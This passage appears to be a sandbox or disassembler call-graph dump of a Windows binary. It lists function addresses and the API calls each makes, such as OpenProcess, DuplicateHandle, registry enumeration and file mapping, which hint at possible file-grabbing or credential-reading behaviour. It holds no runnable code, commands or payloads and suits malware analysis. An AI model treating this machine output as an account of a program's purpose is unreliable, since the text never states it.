39036->39035 39040 40b633 ??3@YAXPAX 39037->39040 39039 40e540 39039->39033 39086 40e2ab 30 API calls 39039->39086 39041 40e5e3 39040->39041 39041->39017 39044 406214 22 API calls 39043->39044 39045 40e03c 39044->39045 39046 40e16b 39045->39046 39047 40dd85 74 API calls 39045->39047 39046->39025 39048 40e06b 39047->39048 39048->39046 39049 40afcf ??2@YAPAXI ??3@YAXPAX 39048->39049 39050 40e08d OpenProcess 39049->39050 39051 40e0a4 GetCurrentProcess DuplicateHandle 39050->39051 39055 40e152 39050->39055 39052 40e0d0 GetFileSize 39051->39052 39053 40e14a CloseHandle 39051->39053 39056 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39052->39056 39053->39055 39054 40e160 39058 40b04b ??3@YAXPAX 39054->39058 39055->39054 39057 406214 22 API calls 39055->39057 39059 40e0ea 39056->39059 39057->39054 39058->39046 39060 4096dc CreateFileW 39059->39060 39061 40e0f1 CreateFileMappingW 39060->39061 39062 40e140 CloseHandle CloseHandle 39061->39062 39063 40e10b MapViewOfFile 39061->39063 39062->39053 39064 40e13b FindCloseChangeNotification 39063->39064 39065 40e11f WriteFile UnmapViewOfFile 39063->39065 39064->39062 39065->39064 39067 40e18c 39066->39067 39068 406b90 11 API calls 39067->39068 39069 40e19f 39068->39069 39070 40e1a7 memset 39069->39070 39071 40e299 39069->39071 39076 40e1e8 39070->39076 39072 4069a3 ??3@YAXPAX ??3@YAXPAX 39071->39072 39073 40e2a4 39072->39073 39073->39039 39074 406e8f 13 API calls 39074->39076 39075 406b53 SetFilePointerEx ReadFile 39075->39076 39076->39074 39076->39075 39077 40e283 39076->39077 39078 40dd50 _wcsicmp 39076->39078 39082 40742e 8 API calls 39076->39082 39083 40aae3 wcslen wcslen _memicmp 39076->39083 39084 40e244 _snwprintf 39076->39084 39079 40e291 39077->39079 39080 40e288 ??3@YAXPAX 39077->39080 39078->39076 39081 40aa04 ??3@YAXPAX 39079->39081 39080->39079 39081->39071 39082->39076 39083->39076 39085 40a8d0 7 API calls 39084->39085 39085->39076 39086->39039 39087->39024 39090 40a980 39088->39090 39089 40a8bb 39089->38949 39089->38950 39090->39089 39091 40a995 _wcsicmp 39090->39091 39092 40a99c wcscmp 39090->39092 39091->39090 39092->39090 39093->38953 39094->38957 39096 40aa23 RegEnumValueW 39095->39096 39096->38964 39096->38965 39098 405335 39097->39098 39099 40522a 39097->39099 39098->38547 39100 40b2cc 27 API calls 39099->39100 39101 405234 39100->39101 39102 40a804 8 API calls 39101->39102 39103 40523a 39102->39103 39142 40b273 39103->39142 39105 405248 _mbscpy _mbscat GetProcAddress 39106 40b273 27 API calls 39105->39106 39107 405279 39106->39107 39145 405211 GetProcAddress 39107->39145 39109 405282 39110 40b273 27 API calls 39109->39110 39111 40528f 39110->39111 39146 405211 GetProcAddress 39111->39146 39113 405298 39114 40b273 27 API calls 39113->39114 39115 4052a5 39114->39115 39147 405211 GetProcAddress 39115->39147 39117 4052ae 39118 40b273 27 API calls 39117->39118 39119 4052bb 39118->39119 39148 405211 GetProcAddress 39119->39148 39121 4052c4 39122 40b273 27 API calls 39121->39122 39123 4052d1 39122->39123 39149 405211 GetProcAddress 39123->39149 39125 4052da 39126 40b273 27 API calls 39125->39126 39127 4052e7 39126->39127 39150 405211 GetProcAddress 39127->39150 39129 4052f0 39130 40b273 27 API calls 39129->39130 39131 4052fd 39130->39131 39151 405211 GetProcAddress 39131->39151 39133 405306 39134 40b273 27 API calls 39133->39134 39135 405313 39134->39135 39152 405211 GetProcAddress 39135->39152 39137 40531c 39138 40b273 27 API calls 39137->39138 39143 40b58d 27 API calls 39142->39143 39144 40b18c 39143->39144 39144->39105 39145->39109 39146->39113 39147->39117 39148->39121 39149->39125 39150->39129 39151->39133 39152->39137 39155 405220 39 API calls 39154->39155 39156 405369 39155->39156 39156->38982 39156->38983 39157->38986 39158->38989 39159->38985 39160->38983 39162 40440c FreeLibrary 39161->39162 39163 40436d 39162->39163 39164 40a804 8 API calls 39163->39164 39165 404377 39164->39165 39166 404383 39165->39166 39167 404405 39165->39167 39168 40b273 27 API calls 39166->39168 39167->38556 39167->38558 39167->38559 39169 40438d GetProcAddress 39168->39169 39170 40b273 27 API calls 39169->39170 39171 4043a7 GetProcAddress 39170->39171 39172 40b273 27 API calls 39171->39172 39173 4043ba GetProcAddress 39172->39173 39174 40b273 27 API calls 39173->39174 39175 4043ce GetProcAddress 39174->39175 39176 40b273 27 API calls 39175->39176 39177 4043e2 GetProcAddress 39176->39177 39178 4043f1 39177->39178 39179 4043f7 39178->39179 39180 40440c FreeLibrary 39178->39180 39179->39167 39180->39167 39182 404413 FreeLibrary 39181->39182 39183 40441e 39181->39183 39182->39183 39183->38573 39184->38565 39186 40442e 39185->39186 39187 40447e 39185->39187 39188 40b2cc 27 API calls 39186->39188 39187->38565 39189 404438 39188->39189 39190 40a804 8 API calls 39189->39190 39191 40443e 39190->39191 39192 404445 39191->39192 39193 404467 39191->39193 39194 40b273 27 API calls 39192->39194 39193->39187 39195 404475 FreeLibrary 39193->39195 39196 40444f GetProcAddress 39194->39196 39195->39187 39196->39193 39197 404460 39196->39197 39197->39193 39199 4135f6 39198->39199 39200 4135eb FreeLibrary 39198->39200 39199->38576 39200->39199 39202 4449c4 39201->39202 39203 444a52 39201->39203 39204 40b2cc 27 API calls 39202->39204 39203->38593 39203->38594 39205 4449cb 39204->39205 39206 40a804 8 API calls 39205->39206 39207 4449d1 39206->39207 39208 40b273 27 API calls 39207->39208 39209 4449dc GetProcAddress 39208->39209 39210 40b273 27 API calls 39209->39210 39211 4449f3 GetProcAddress 39210->39211 39212 40b273 27 API calls 39211->39212 39213 444a04 GetProcAddress 39212->39213 39214 40b273 27 API calls 39213->39214 39215 444a15 GetProcAddress 39214->39215 39216 40b273 27 API calls 39215->39216 39217 444a26 GetProcAddress 39216->39217 39222->38604 39223->38604 39224->38604 39225->38604 39226->38595 39228 403a29 39227->39228 39242 403bed memset memset 39228->39242 39230 403ae7 39255 40b1ab ??3@YAXPAX ??3@YAXPAX 39230->39255 39231 403a3f memset 39237 403a2f 39231->39237 39233 403aef 39233->38612 39234 409b98 GetFileAttributesW 39234->39237 39235 40a8d0 7 API calls 39235->39237 39236 409d1f 6 API calls 39236->39237 39237->39230 39237->39231 39237->39234 39237->39235 39237->39236 39239 40a051 GetFileTime FindCloseChangeNotification 39238->39239 39240 4039ca CompareFileTime 39238->39240 39239->39240 39240->38612 39241->38611 39243 414c2e 16 API calls 39242->39243 39244 403c38 39243->39244 39245 409719 2 API calls 39244->39245 39246 403c3f wcscat 39245->39246 39247 414c2e 16 API calls 39246->39247 39248 403c61 39247->39248 39249 409719 2 API calls 39248->39249 39250 403c68 wcscat 39249->39250 39256 403af5 39250->39256 39253 403af5 20 API calls 39254 403c95 39253->39254 39254->39237 39255->39233 39257 403b02 39256->39257 39258 40ae18 9 API calls 39257->39258 39266 403b37 39258->39266 39259 403bdb 39261 40aebe FindClose 39259->39261 39260 40add4 wcscmp wcscmp 39260->39266 39262 403be6 39261->39262 39262->39253 39263 40ae18 9 API calls 39263->39266 39264 40ae51 9 API calls 39264->39266 39265 40aebe FindClose 39265->39266 39266->39259 39266->39260 39266->39263 39266->39264 39266->39265 39267 40a8d0 7 API calls 39266->39267 39267->39266 39269 409d1f 6 API calls 39268->39269 39270 404190 39269->39270 39283 409b98 GetFileAttributesW 39270->39283 39272 40419c 39273 4041a7 6 API calls 39272->39273 39274 40435c 39272->39274 39276 40424f 39273->39276 39274->38638 39276->39274 39277 40425e memset 39276->39277 39279 409d1f 6 API calls 39276->39279 39280 40a8ab 9 API calls 39276->39280 39284 414842 39276->39284 39277->39276 39278 404296 wcscpy 39277->39278 39278->39276 39279->39276 39281 4042b6 memset memset _snwprintf wcscpy 39280->39281 39281->39276 39282->38636 39283->39272 39287 41443e 39284->39287 39286 414866 39286->39276 39288 41444b 39287->39288 39289 414451 39288->39289 39290 4144a3 GetPrivateProfileStringW 39288->39290 39291 414491 39289->39291 39292 414455 wcschr 39289->39292 39290->39286 39293 414495 WritePrivateProfileStringW 39291->39293 39292->39291 39294 414463 _snwprintf 39292->39294 39293->39286 39294->39293 39295->38642 39297 40b2cc 27 API calls 39296->39297 39298 409615 39297->39298 39299 409d1f 6 API calls 39298->39299 39300 409625 39299->39300 39325 409b98 GetFileAttributesW 39300->39325 39302 409634 39303 409648 39302->39303 39326 4091b8 memset 39302->39326 39305 40b2cc 27 API calls 39303->39305 39307 408801 39303->39307 39306 40965d 39305->39306 39308 409d1f 6 API calls 39306->39308 39307->38645 39307->38646 39309 40966d 39308->39309 39378 409b98 GetFileAttributesW 39309->39378 39311 40967c 39311->39307 39312 409681 39311->39312 39379 409529 72 API calls 39312->39379 39314 409690 39314->39307 39325->39302 39380 40a6e6 WideCharToMultiByte 39326->39380 39328 409202 39381 444432 39328->39381 39331 40b273 27 API calls 39332 409236 39331->39332 39427 438552 39332->39427 39335 409383 39337 40b273 27 API calls 39335->39337 39339 409399 39337->39339 39358 40951d 39358->39303 39378->39311 39379->39314 39380->39328 39477 4438b5 39381->39477 39383 44444c 39389 409215 39383->39389 39491 415a6d 39383->39491 39386 444486 39388 4444b9 memcpy 39386->39388 39426 4444a4 39386->39426 39387 44469e 39387->39389 39391 443d90 111 API calls 39387->39391 39495 415258 39388->39495 39389->39331 39389->39358 39391->39389 39392 444524 39393 444541 39392->39393 39394 44452a 39392->39394 39498 444316 39393->39498 39532 416935 39394->39532 39545 4442e6 11 API calls 39426->39545 39546 438460 39427->39546 39429 409240 39429->39335 39430 4251c4 39429->39430 39558 424f07 39430->39558 39478 4438d0 39477->39478 39489 4438c9 39477->39489 39479 415378 memcpy memcpy 39478->39479 39480 4438d5 39479->39480 39481 4154e2 10 API calls 39480->39481 39482 443906 39480->39482 39480->39489 39481->39482 39483 443970 memset 39482->39483 39482->39489 39486 44398b 39483->39486 39484 4439a0 39485 415700 10 API calls 39484->39485 39484->39489 39487 4439c0 39485->39487 39486->39484 39488 41975c 10 API calls 39486->39488 39487->39489 39490 418981 10 API calls 39487->39490 39488->39484 39489->39383 39490->39489 39492 415a77 39491->39492 39493 415a8d 39492->39493 39494 415a7e memset 39492->39494 39493->39386 39494->39493 39496 4438b5 11 API calls 39495->39496 39497 41525d 39496->39497 39497->39392 39499 444328 39498->39499 39500 444423 39499->39500 39501 44434e 39499->39501 39502 4446ea 11 API calls 39500->39502 39503 432d4e memset memset memcpy 39501->39503 39533 41693e 39532->39533 39536 41698e 39532->39536 39534 41694c 39533->39534 39535 422fd1 memset 39533->39535 39534->39536 39537 4165a0 11 API calls 39534->39537 39535->39534 39536->39426 39538 416972 39537->39538 39538->39536 39545->39387 39547 41703f 11 API calls 39546->39547 39548 43847a 39547->39548 39549 43848a 39548->39549 39550 43847e 39548->39550 39552 438270 134 API calls 39549->39552 39551 4446ea 11 API calls 39550->39551 39554 438488 39551->39554 39553 4384aa 39552->39553 39553->39554 39555 424f26 123 API calls 39553->39555 39554->39429 39556 4384bb 39555->39556 39557 438270 134 API calls 39556->39557 39557->39554 39559 424f1f 39558->39559 39560 424f0c 39558->39560 39622 413f4f 39595->39622 39598 413f37 K32GetModuleFileNameExW 39599 413f4a 39598->39599 39599->38704 39601 413969 wcscpy 39600->39601 39602 41396c wcschr 39600->39602 39614 413a3a 39601->39614 39602->39601 39604 41398e 39602->39604 39627 4097f7 wcslen wcslen _memicmp 39604->39627 39606 41399a 39607 4139a4 memset 39606->39607 39608 4139e6 39606->39608 39628 409dd5 GetWindowsDirectoryW wcscpy 39607->39628 39610 413a31 wcscpy 39608->39610 39611 4139ec memset 39608->39611 39610->39614 39629 409dd5 GetWindowsDirectoryW wcscpy 39611->39629 39612 4139c9 wcscpy wcscat 39612->39614 39614->38704 39615 413a11 memcpy wcscat 39615->39614 39617 413cb0 GetModuleHandleW 39616->39617 39618 413cda 39616->39618 39617->39618 39619 413cbf GetProcAddress 39617->39619 39620 413ce3 GetProcessTimes 39618->39620 39621 413cf6 39618->39621 39619->39618 39620->38707 39621->38707 39623 413f2f 39622->39623 39624 413f54 39622->39624 39623->39598 39623->39599 39625 40a804 8 API calls 39624->39625 39626 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39625->39626 39626->39623 39627->39606 39628->39612 39629->39615 39630->38728 39631->38751 39633 409cf9 GetVersionExW 39632->39633 39634 409d0a 39632->39634 39633->39634 39634->38757 39634->38761 39635->38763 39636->38766 39637->38768 39638->38833 39640 40bba5 39639->39640 39687 40cc26 39640->39687 39643 40bd4b 39715 40cc0c 39643->39715 39648 40b2cc 27 API calls 39649 40bbef 39648->39649 39708 40ccf0 39649->39708 39651 40bbf5 39651->39643 39712 40ccb4 39651->39712 39654 40cf04 17 API calls 39655 40bc2e 39654->39655 39656 40bd43 39655->39656 39657 40b2cc 27 API calls 39655->39657 39658 40cc0c 4 API calls 39656->39658 39659 40bc40 39657->39659 39658->39643 39660 40ccf0 _wcsicmp 39659->39660 39661 40bc46 39660->39661 39661->39656 39662 40bc61 memset memset WideCharToMultiByte 39661->39662 39722 40103c strlen 39662->39722 39664 40bcc0 39665 40b273 27 API calls 39664->39665 39666 40bcd0 memcmp 39665->39666 39666->39656 39667 40bce2 39666->39667 39668 404423 37 API calls 39667->39668 39669 40bd10 39668->39669 39669->39656 39670 40bd3a LocalFree 39669->39670 39671 40bd1f memcpy 39669->39671 39670->39656 39671->39670 39672->38848 39674 409a74 GetTempFileNameW 39673->39674 39675 409a66 GetWindowsDirectoryW 39673->39675 39674->38847 39675->39674 39676->38885 39677->38885 39678->38885 39679->38885 39680->38885 39681->38885 39682->38885 39683->38885 39684->38885 39685->38860 39686->38882 39723 4096c3 CreateFileW 39687->39723 39689 40cc34 39690 40cc3d GetFileSize 39689->39690 39698 40bbca 39689->39698 39691 40afcf 2 API calls 39690->39691 39692 40cc64 39691->39692 39724 40a2ef ReadFile 39692->39724 39694 40cc71 39725 40ab4a MultiByteToWideChar 39694->39725 39696 40cc95 FindCloseChangeNotification 39697 40b04b ??3@YAXPAX 39696->39697 39697->39698 39698->39643 39699 40cf04 39698->39699 39700 40b633 ??3@YAXPAX 39699->39700 39701 40cf14 39700->39701 39731 40b1ab ??3@YAXPAX ??3@YAXPAX 39701->39731 39703 40bbdd 39703->39643 39703->39648 39704 40cf1b 39704->39703 39706 40cfef 39704->39706 39732 40cd4b 39704->39732 39707 40cd4b 14 API calls 39706->39707 39707->39703 39709 40ccfd 39708->39709 39711 40cd3f 39708->39711 39710 40cd26 _wcsicmp 39709->39710 39709->39711 39710->39709 39710->39711 39711->39651 39713 40aa29 6 API calls 39712->39713 39714 40bc26 39713->39714 39714->39654 39716 40b633 ??3@YAXPAX 39715->39716 39717 40cc15 39716->39717 39718 40aa04 ??3@YAXPAX 39717->39718 39719 40cc1d 39718->39719 39781 40b1ab ??3@YAXPAX ??3@YAXPAX 39719->39781 39721 40b7d4 memset CreateFileW 39721->38840 39721->38841 39722->39664 39723->39689 39724->39694 39726 40ab93 39725->39726 39727 40ab6b 39725->39727 39726->39696 39728 40a9ce 4 API calls 39727->39728 39729 40ab74 39728->39729 39730 40ab7c MultiByteToWideChar 39729->39730 39730->39726 39731->39704 39733 40cd7b 39732->39733 39766 40aa29 39733->39766 39735 40cef5 39736 40aa04 ??3@YAXPAX 39735->39736 39737 40cefd 39736->39737 39737->39704 39739 40aa29 6 API calls 39740 40ce1d 39739->39740 39741 40aa29 6 API calls 39740->39741 39742 40ce3e 39741->39742 39743 40ce6a 39742->39743 39774 40abb7 wcslen memmove 39742->39774 39744 40ce9f 39743->39744 39777 40abb7 wcslen memmove 39743->39777 39746 40a8d0 7 API calls 39744->39746 39749 40ceb5 39746->39749 39747 40ce56 39775 40aa71 wcslen 39747->39775 39756 40a8d0 7 API calls 39749->39756 39751 40ce8b 39778 40aa71 wcslen 39751->39778 39753 40ce5e 39776 40abb7 wcslen memmove 39753->39776 39754 40ce93 39779 40abb7 wcslen memmove 39754->39779 39758 40cecb 39756->39758 39780 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 39758->39780 39760 40cedd 39761 40aa04 ??3@YAXPAX 39760->39761 39762 40cee5 39761->39762 39763 40aa04 ??3@YAXPAX 39762->39763 39764 40ceed 39763->39764 39765 40aa04 ??3@YAXPAX 39764->39765 39765->39735 39767 40aa33 39766->39767 39768 40aa63 39766->39768 39769 40aa44 39767->39769 39770 40aa38 wcslen 39767->39770 39768->39735 39768->39739 39771 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 39769->39771 39770->39769 39772 40aa4d 39771->39772 39772->39768 39773 40aa51 memcpy 39772->39773 39773->39768 39774->39747 39775->39753 39776->39743 39777->39751 39778->39754 39779->39744 39780->39760 39781->39721 39782->38900 39783->38908 37667 44dea5 37668 44deb5 FreeLibrary 37667->37668 37669 44dec3 37667->37669 37668->37669 39793 4148b6 FindResourceW 39794 4148cf SizeofResource 39793->39794 39797 4148f9 39793->39797 39795 4148e0 LoadResource 39794->39795 39794->39797 39796 4148ee LockResource 39795->39796 39795->39797 39796->39797 39798 44197d 147 API calls 37848 415304 ??3@YAXPAX 37670 415320 realloc 37671 415340 37670->37671 37672 41534d 37670->37672 37674 416760 11 API calls 37672->37674 37674->37671 39799 441b3f 39809 43a9f6 39799->39809 39801 441b61 39982 4386af memset 39801->39982 39803 44189a 39804 4418e2 39803->39804 39808 442bd4 39803->39808 39805 4418ea 39804->39805 39983 4414a9 12 API calls 39804->39983 39808->39805 39984 441409 memset 39808->39984 39810 43aa20 39809->39810 39811 43aadf 39809->39811 39810->39811 39812 43aa34 memset 39810->39812 39811->39801 39813 43aa56 39812->39813 39814 43aa4d 39812->39814 39985 43a6e7 39813->39985 39993 42c02e memset 39814->39993 39819 43aad3 39995 4169a7 11 API calls 39819->39995 39820 43aaae 39820->39811 39820->39819 39835 43aae5 39820->39835 39821 43ac18 39824 43ac47 39821->39824 39997 42bbd5 memcpy memcpy memcpy memset memcpy 39821->39997 39825 43aca8 39824->39825 39998 438eed 16 API calls 39824->39998 39829 43acd5 39825->39829 40000 4233ae 11 API calls 39825->40000 39828 43ac87 39999 4233c5 16 API calls 39828->39999 40001 423426 11 API calls 39829->40001 39833 43ace1 40002 439811 163 API calls 39833->40002 39834 43a9f6 161 API calls 39834->39835 39835->39811 39835->39821 39835->39834 39996 439bbb 22 API calls 39835->39996 39837 43acfd 39842 43ad2c 39837->39842 40003 438eed 16 API calls 39837->40003 39839 43ad19 40004 4233c5 16 API calls 39839->40004 39841 43ad58 40005 44081d 163 API calls 39841->40005 39842->39841 39845 43add9 39842->39845 40009 423426 11 API calls 39845->40009 39846 43ae3a memset 39847 43ae73 39846->39847 40010 42e1c0 147 API calls 39847->40010 39848 43adab 40007 438c4e 163 API calls 39848->40007 39849 43ad6c 39849->39811 39849->39848 40006 42370b memset memcpy memset 39849->40006 39853 43adcc 40008 440f84 12 API calls 39853->40008 39854 43ae96 40011 42e1c0 147 API calls 39854->40011 39857 43aea8 39858 43aec1 39857->39858 40012 42e199 147 API calls 39857->40012 39859 43af00 39858->39859 40013 42e1c0 147 API calls 39858->40013 39859->39811 39863 43af1a 39859->39863 39864 43b3d9 39859->39864 40014 438eed 16 API calls 39863->40014 39869 43b3f6 39864->39869 39873 43b4c8 39864->39873 39865 43b60f 39865->39811 40073 4393a5 17 API calls 39865->40073 39868 43af2f 40015 4233c5 16 API calls 39868->40015 40055 432878 12 API calls 39869->40055 39871 43af51 40016 423426 11 API calls 39871->40016 39879 43b4f2 39873->39879 40061 42bbd5 memcpy memcpy memcpy memset memcpy 39873->40061 39875 43af7d 40017 423426 11 API calls 39875->40017 40062 43a76c 21 API calls 39879->40062 39880 43b529 40063 44081d 163 API calls 39880->40063 39881 43b462 40057 423330 11 API calls 39881->40057 39882 43af94 40018 423330 11 API calls 39882->40018 39886 43afca 40019 423330 11 API calls 39886->40019 39887 43b47e 39891 43b497 39887->39891 40058 42374a memcpy memset memcpy memcpy memcpy 39887->40058 39888 43b544 39892 43b55c 39888->39892 40064 42c02e memset 39888->40064 39889 43b428 39889->39881 40056 432b60 16 API calls 39889->40056 40059 4233ae 11 API calls 39891->40059 40065 43a87a 163 API calls 39892->40065 39894 43afdb 40020 4233ae 11 API calls 39894->40020 39899 43b56c 39903 43b58a 39899->39903 40066 423330 11 API calls 39899->40066 39900 43b4b1 40060 423399 11 API calls 39900->40060 39902 43afee 40021 44081d 163 API calls 39902->40021 40067 440f84 12 API calls 39903->40067 39904 43b4c1 40069 42db80 163 API calls 39904->40069 39909 43b592 40068 43a82f 16 API calls 39909->40068 39912 43b5b4 40070 438c4e 163 API calls 39912->40070 39914 43b5cf 40071 42c02e memset 39914->40071 39916 43b005 39916->39811 39920 43b01f 39916->39920 40022 42d836 163 API calls 39916->40022 39917 43b1ef 40032 4233c5 16 API calls 39917->40032 39920->39917 40030 423330 11 API calls 39920->40030 40031 42d71d 163 API calls 39920->40031 39921 43b212 40033 423330 11 API calls 39921->40033 39923 43b087 40023 4233ae 11 API calls 39923->40023 39924 43add4 39924->39865 40072 438f86 16 API calls 39924->40072 39927 43b22a 40034 42ccb5 11 API calls 39927->40034 39930 43b23f 40035 4233ae 11 API calls 39930->40035 39931 43b10f 40026 423330 11 API calls 39931->40026 39933 43b257 40036 4233ae 11 API calls 39933->40036 39937 43b129 40027 4233ae 11 API calls 39937->40027 39938 43b26e 40037 4233ae 11 API calls 39938->40037 39941 43b09a 39941->39931 40024 42cc15 19 API calls 39941->40024 40025 4233ae 11 API calls 39941->40025 39942 43b282 40038 43a87a 163 API calls 39942->40038 39944 43b13c 40028 440f84 12 API calls 39944->40028 39946 43b29d 40039 423330 11 API calls 39946->40039 39949 43b15f 40029 4233ae 11 API calls 39949->40029 39950 43b2af 39951 43b2b8 39950->39951 39952 43b2ce 39950->39952 40040 4233ae 11 API calls 39951->40040 40041 440f84 12 API calls 39952->40041 39956 43b2c9 40043 4233ae 11 API calls 39956->40043 39957 43b2da 40042 42370b memset memcpy memset 39957->40042 39960 43b2f9 40044 423330 11 API calls 39960->40044 39962 43b30b 40045 423330 11 API calls 39962->40045 39964 43b325 40046 423399 11 API calls 39964->40046 39966 43b332 40047 4233ae 11 API calls 39966->40047 39968 43b354 40048 423399 11 API calls 39968->40048 39970 43b364 40049 43a82f 16 API calls 39970->40049 39972 43b370 40050 42db80 163 API calls 39972->40050 39974 43b380 40051 438c4e 163 API calls 39974->40051 39976 43b39e 40052 423399 11 API calls 39976->40052 39978 43b3ae 40053 43a76c 21 API calls 39978->40053 39980 43b3c3 40054 423399 11 API calls 39980->40054 39982->39803 39983->39805 39984->39808 39986 43a6f5 39985->39986 39987 43a765 39985->39987 39986->39987 40074 42a115 39986->40074 39987->39811 39994 4397fd memset 39987->39994 39991 43a73d 39991->39987 39992 42a115 147 API calls 39991->39992 39992->39987 39993->39813 39994->39820 39995->39811 39996->39835 39997->39824 39998->39828 39999->39825 40000->39829 40001->39833 40002->39837 40003->39839 40004->39842 40005->39849 40006->39848 40007->39853 40008->39924 40009->39846 40010->39854 40011->39857 40012->39858 40013->39858 40014->39868 40015->39871 40016->39875 40017->39882 40018->39886 40019->39894 40020->39902 40021->39916 40022->39923 40023->39941 40024->39941 40025->39941 40026->39937 40027->39944 40028->39949 40029->39920 40030->39920 40031->39920 40032->39921 40033->39927 40034->39930 40035->39933 40036->39938 40037->39942 40038->39946 40039->39950 40040->39956 40041->39957 40042->39956 40043->39960 40044->39962 40045->39964 40046->39966 40047->39968 40048->39970 40049->39972 40050->39974 40051->39976 40052->39978 40053->39980 40054->39924 40055->39889 40056->39881 40057->39887 40058->39891 40059->39900 40060->39904 40061->39879 40062->39880 40063->39888 40064->39892 40065->39899 40066->39903 40067->39909 40068->39904 40069->39912 40070->39914 40071->39924 40072->39865 40073->39811 40075 42a175 40074->40075 40077 42a122 40074->40077 40075->39987 40080 42b13b 147 API calls 40075->40080 40077->40075 40078 42a115 147 API calls 40077->40078 40081 43a174 40077->40081 40105 42a0a8 147 API calls 40077->40105 40078->40077 40080->39991 40095 43a196 40081->40095 40096 43a19e 40081->40096 40082 43a306 40082->40095 40114 4388c4 14 API calls 40082->40114 40085 42a115 147 API calls 40085->40096 40087 43a642 40087->40095 40135 4169a7 11 API calls 40087->40135 40091 43a635 40134 42c02e memset 40091->40134 40095->40077 40096->40082 40096->40085 40096->40095 40106 42ff8c 40096->40106 40122 415a91 40096->40122 40126 4165ff 40096->40126 40129 439504 13 API calls 40096->40129 40130 4312d0 147 API calls 40096->40130 40131 42be4c memcpy memcpy memcpy memset memcpy 40096->40131 40132 43a121 11 API calls 40096->40132 40098 4169a7 11 API calls 40099 43a325 40098->40099 40099->40087 40099->40091 40099->40095 40099->40098 40100 42b5b5 memset memcpy 40099->40100 40101 42bf4c 14 API calls 40099->40101 40104 4165ff 11 API calls 40099->40104 40115 42b63e 40099->40115 40133 42bfcf memcpy 40099->40133 40100->40099 40101->40099 40104->40099 40105->40077 40136 43817e 40106->40136 40108 42ff99 40109 42ffe3 40108->40109 40110 42ffd0 40108->40110 40113 42ff9d 40108->40113 40141 4169a7 11 API calls 40109->40141 40140 4169a7 11 API calls 40110->40140 40113->40096 40114->40099 40290 42b4ec 40115->40290 40117 42b64c 40296 42b5e4 memset 40117->40296 40119 42b65e 40120 42b66d 40119->40120 40297 42b3c6 11 API calls 40119->40297 40120->40099 40123 415a9d 40122->40123 40124 415ab3 40123->40124 40125 415aa4 memset 40123->40125 40124->40096 40125->40124 40298 4165a0 40126->40298 40129->40096 40130->40096 40131->40096 40132->40096 40133->40099 40134->40087 40135->40095 40137 438187 40136->40137 40139 438192 40136->40139 40142 4380f6 40137->40142 40139->40108 40140->40113 40141->40113 40144 43811f 40142->40144 40143 438164 40143->40139 40144->40143 40146 4300e8 3 API calls 40144->40146 40147 437e5e 40144->40147 40146->40144 40170 437d3c 40147->40170 40149 437eb3 40149->40144 40150 437ea9 40150->40149 40155 437f22 40150->40155 40185 41f432 40150->40185 40153 437f06 40232 415c56 11 API calls 40153->40232 40157 437f7f 40155->40157 40158 432d4e 3 API calls 40155->40158 40156 437f95 40233 415c56 11 API calls 40156->40233 40157->40156 40159 43802b 40157->40159 40158->40157 40161 4165ff 11 API calls 40159->40161 40162 438054 40161->40162 40196 437371 40162->40196 40165 43806b 40166 438094 40165->40166 40234 42f50e 138 API calls 40165->40234 40168 437fa3 40166->40168 40169 4300e8 3 API calls 40166->40169 40168->40149 40235 41f638 104 API calls 40168->40235 40169->40168 40171 437d69 40170->40171 40174 437d80 40170->40174 40236 437ccb 11 API calls 40171->40236 40173 437d76 40173->40150 40174->40173 40175 437da3 40174->40175 40177 437d90 40174->40177 40178 438460 134 API calls 40175->40178 40177->40173 40240 437ccb 11 API calls 40177->40240 40181 437dcb 40178->40181 40179 437de8 40239 424f26 123 API calls 40179->40239 40181->40179 40237 444283 13 API calls 40181->40237 40183 437dfc 40238 437ccb 11 API calls 40183->40238 40186 41f54d 40185->40186 40192 41f44f 40185->40192 40187 41f466 40186->40187 40270 41c635 memset memset 40186->40270 40187->40153 40187->40155 40192->40187 40194 41f50b 40192->40194 40241 41f1a5 40192->40241 40266 41c06f memcmp 40192->40266 40267 41f3b1 90 API calls 40192->40267 40268 41f398 86 API calls 40192->40268 40194->40186 40194->40187 40269 41c295 86 API calls 40194->40269 40271 41703f 40196->40271 40198 437399 40199 43739d 40198->40199 40201 4373ac 40198->40201 40278 4446ea 11 API calls 40199->40278 40202 416935 16 API calls 40201->40202 40203 4373ca 40202->40203 40204 438460 134 API calls 40203->40204 40209 4251c4 137 API calls 40203->40209 40213 415a91 memset 40203->40213 40216 43758f 40203->40216 40228 437584 40203->40228 40231 437d3c 135 API calls 40203->40231 40279 425433 13 API calls 40203->40279 40280 425413 17 API calls 40203->40280 40281 42533e 16 API calls 40203->40281 40282 42538f 16 API calls 40203->40282 40283 42453e 123 API calls 40203->40283 40204->40203 40205 4375bc 40286 415c7d 16 API calls 40205->40286 40208 4375d2 40230 4373a7 40208->40230 40287 4442e6 11 API calls 40208->40287 40209->40203 40211 4375e2 40211->40230 40288 444283 13 API calls 40211->40288 40213->40203 40284 42453e 123 API calls 40216->40284 40219 4375f4 40222 437620 40219->40222 40223 43760b 40219->40223 40221 43759f 40224 416935 16 API calls 40221->40224 40226 416935 16 API calls 40222->40226 40289 444283 13 API calls 40223->40289 40224->40228 40226->40230 40228->40205 40285 42453e 123 API calls 40228->40285 40229 437612 memcpy 40229->40230 40230->40165 40231->40203 40232->40149 40233->40168 40234->40166 40235->40149 40236->40173 40237->40183 40238->40179 40239->40173 40240->40173 40242 41bc3b 101 API calls 40241->40242 40243 41f1b4 40242->40243 40244 41edad 86 API calls 40243->40244 40251 41f282 40243->40251 40245 41f1cb 40244->40245 40246 41f1f5 memcmp 40245->40246 40247 41f20e 40245->40247 40245->40251 40246->40247 40248 41f21b memcmp 40247->40248 40247->40251 40249 41f326 40248->40249 40252 41f23d 40248->40252 40250 41ee6b 86 API calls 40249->40250 40249->40251 40250->40251 40251->40192 40252->40249 40253 41f28e memcmp 40252->40253 40255 41c8df 56 API calls 40252->40255 40253->40249 40254 41f2a9 40253->40254 40254->40249 40257 41f308 40254->40257 40258 41f2d8 40254->40258 40256 41f269 40255->40256 40256->40249 40259 41f287 40256->40259 40260 41f27a 40256->40260 40257->40249 40264 4446ce 11 API calls 40257->40264 40261 41ee6b 86 API calls 40258->40261 40259->40253 40262 41ee6b 86 API calls 40260->40262 40263 41f2e0 40261->40263 40262->40251 40265 41b1ca memset 40263->40265 40264->40249 40265->40251 40266->40192 40267->40192 40268->40192 40269->40186 40270->40187 40272 417044 40271->40272 40273 41705c 